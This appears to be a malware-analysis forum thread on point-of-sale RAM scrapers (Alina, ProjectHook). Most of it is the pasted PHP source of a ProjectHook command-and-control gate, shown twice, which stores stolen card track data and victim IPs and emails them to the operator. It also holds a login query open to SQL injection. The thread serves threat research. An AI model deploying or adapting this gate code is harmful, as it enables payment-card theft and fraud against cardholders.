A forum for reverse engineering, OS internals and malware analysis
ikolor wrote:next ..This is Alina POS, in attach unpacked. Posts moved.
https://www.virustotal.com/en/file/2b36 ... 457283940/
<?php
//$email = "XXXX@XXXX.XXX";
$email = "XXXX@XXXX.XX";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";
include "db.php";
function getUserIP()
{
$client = @$_SERVER['HTTP_CLIENT_IP'];
$forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
$remote = $_SERVER['REMOTE_ADDR'];
if(filter_var($client, FILTER_VALIDATE_IP))
{
$ip = $client;
}
elseif(filter_var($forward, FILTER_VALIDATE_IP))
{
$ip = $forward;
}
else
{
$ip = $remote;
}
return $ip;
}
$user_ip = getUserIP();
// Initialize ExtendedAddslash() function for every $_POST variable
$byte = $_POST['BYTE'];
$data = $_POST['DATA'];
$id = $_POST['ID'];
$proc = $_POST['PROC'];
$track1 = $_POST['T1'];
$track2 = $_POST['T2'];
// search submission ID
$query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);
if ($resultcount > 0) {
mysql_query("UPDATE `hook` SET
`ip` = '$user_ip',
`t1` = '$track1',
`t2` = '$track2',
`data` = '$data',
`proc` = '$proc',
`byte` = '$byte'
WHERE `submission_id` = '$id'")
or die(mysql_error());
} else {
mysql_query("INSERT INTO `hook` (ip, data, id,
byte, proc, t1, t2)
VALUES ('$user_ip', '$data', '$id',
'$byte', '$proc', '$track1', '$track2') ")
or die(mysql_error());
}
mail($email, "New Data: $user_ip : $data : $proc : $track1 : $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>
// Create query
$q = "SELECT * FROM `dbUsers` WHERE `username`='".$_POST["username"]."' AND `password`='".$_POST["password"]."' LIMIT 1";
// Run query
$r = mysql_query($q);
benkow_ wrote:ProjectHook RAM scraper seems to be alive (thx to xylitol)Looks like the author or someone who edited the php files is Romanian - some strings from failed login indicate that.
I cannot found any malware sample but attached the source code of the new panel
new gate rxcx.php:Code: Select all<?php //$email = "XXXX@XXXX.XXX"; $email = "XXXX@XXXX.XX"; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "From: dump@db.com\r\n"; include "db.php"; function getUserIP() { $client = @$_SERVER['HTTP_CLIENT_IP']; $forward = @$_SERVER['HTTP_X_FORWARDED_FOR']; $remote = $_SERVER['REMOTE_ADDR']; if(filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif(filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } $user_ip = getUserIP(); // Initialize ExtendedAddslash() function for every $_POST variable $byte = $_POST['BYTE']; $data = $_POST['DATA']; $id = $_POST['ID']; $proc = $_POST['PROC']; $track1 = $_POST['T1']; $track2 = $_POST['T2']; // search submission ID $query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'"; $sqlsearch = mysql_query($query); $resultcount = mysql_numrows($sqlsearch); if ($resultcount > 0) { mysql_query("UPDATE `hook` SET `ip` = '$user_ip', `t1` = '$track1', `t2` = '$track2', `data` = '$data', `proc` = '$proc', `byte` = '$byte' WHERE `submission_id` = '$id'") or die(mysql_error()); } else { mysql_query("INSERT INTO `hook` (ip, data, id, byte, proc, t1, t2) VALUES ('$user_ip', '$data', '$id', '$byte', '$proc', '$track1', '$track2') ") or die(mysql_error()); } mail($email, "New Data: $user_ip : $data : $proc : $track1 : $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers); ?>
